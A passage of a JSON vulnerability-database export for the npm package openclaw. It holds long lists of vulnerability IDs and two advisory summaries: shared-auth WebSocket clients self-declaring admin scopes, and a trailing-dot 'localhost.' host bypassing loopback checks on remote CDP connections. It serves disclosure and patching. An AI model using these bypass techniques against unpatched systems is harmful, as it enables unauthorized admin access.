"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35635","GHSA-rqp8-q22p-5j9q"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x9qg-8qk5-s3d6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91226?format=json","vulnerability_id":"VCID-xdr6-tfsy-rqeu","summary":"OpenClaw: WebSocket shared-auth connections could self-declare elevated scopes\n### Summary\n\nA logic flaw in the OpenClaw gateway WebSocket connect path allowed certain device-less shared-token or password-authenticated backend connections to keep client-declared scopes without server-side binding. A shared-authenticated client could present elevated scopes such as `operator.admin` even though those scopes were not tied to a device identity or an explicitly trusted Control UI path.\n\n### Impact\n\nThis crossed the intended authorization boundary and could let a shared-secret-authenticated backend client perform admin-only gateway operations.\n\n### Affected versions\n\n`openclaw` `<= 2026.3.11`\n\n### Patch\n\nFixed in `openclaw` `2026.3.12`. The gateway now clears unbound scopes for non-Control-UI shared-auth connections, and regression tests cover the device-less shared-auth path.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22172","reference_id":"","reference_type":"","scores":[{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.05921","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.05914","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00021","scoring_system":"epss","scoring_elements":"0.05912","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-22172"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/5e389d5e7c9233ec91026ab2fea299ebaf3249f6","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/5e389d5e7c9233ec91026ab2fea299ebaf3249f6"},{"reference_url":"https://github.com/openclaw/openclaw/pull/44306","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/pull/44306"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.12"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rqpp-rjj8-7wv8","reference_id":"","reference_type":"","scores":[{"value":"9.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.4","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-20T18:03:44Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rqpp-rjj8-7wv8"},{"reference_url":"https://github.com/advisories/GHSA-rqpp-rjj8-7wv8","reference_id":"GHSA-rqpp-rjj8-7wv8","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rqpp-rjj8-7wv8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112780?format=json","purl":"pkg:npm/openclaw@2026.3.12","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3qbe-dsde-p7dz"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-44hp-3xh1-uyen"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gncw-wfqt-9yek"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hynd-965v-n3aq"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-tdjc-vav8-97cf"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.12"}],"aliases":["CVE-2026-22172","GHSA-rqpp-rjj8-7wv8"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-xdr6-tfsy-rqeu"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90049?format=json","vulnerability_id":"VCID-xfgw-ua7r-abbr","summary":"OpenClaw: Trailing-dot localhost CDP hosts could bypass remote loopback protections\n## Summary\n\nBefore OpenClaw 2026.4.2, remote CDP discovery could return a trailing-dot localhost host such as `localhost.` and bypass OpenClaw's loopback-host normalization. That let a non-loopback remote CDP profile pivot the follow-up connection back onto localhost.\n\n## Impact\n\nA hostile discovery response could retarget authenticated browser control toward a localhost-resolving endpoint on the OpenClaw host. This weakened the existing remote-CDP loopback protection and could expose localhost-backed browser state.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `9c22d636697336a6b22b0ae24798d8b8325d7828` — normalize localhost absolute-form CDP hosts before loopback checks\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @smaeljaish771 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41372","reference_id":"","reference_type":"","scores":[{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.1326","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.13224","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00042","scoring_system":"epss","scoring_elements":"0.13264","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41372"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/9c22d636697336a6b22b0ae24798d8b8325d7828","reference_id":"","reference_type":"","scores":[{"value":"5.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N"},{"value":"6.9","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-28T14:41:19Z/"}],"url":"https://github.com/openc